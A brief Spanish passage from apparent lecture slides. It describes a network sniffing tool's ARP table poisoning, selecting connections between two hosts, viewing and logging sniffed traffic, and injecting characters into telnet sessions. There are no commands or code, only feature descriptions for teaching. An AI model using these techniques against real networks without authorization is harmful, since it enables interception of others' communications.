51 Evenenamiento de las tablas arp Con la opción a se envenenan las tablas arp de las maquinas seleccionadas. Lámina 101 Estado conexiones entre hosts Después de seleccionar un método, la interfaz muestra todas las conexiones entre los dos hosts Se puede elegir la conexión que se desea sniffear Cada conexión tiene un atributo (activo o silencio) que indica si existe alguna actividad en esta conexión. Lámina

52 Viendo la comunicación Lámina 103 Snifeando la conexión La interfaz de snifeo muestra tanto el puerto fuente como destino. Es posible registrar los datos sniffeados, examinarlo en modo ascii o hexadecimal, inyectar caracteres en una conexión telnet y mucho más Lámina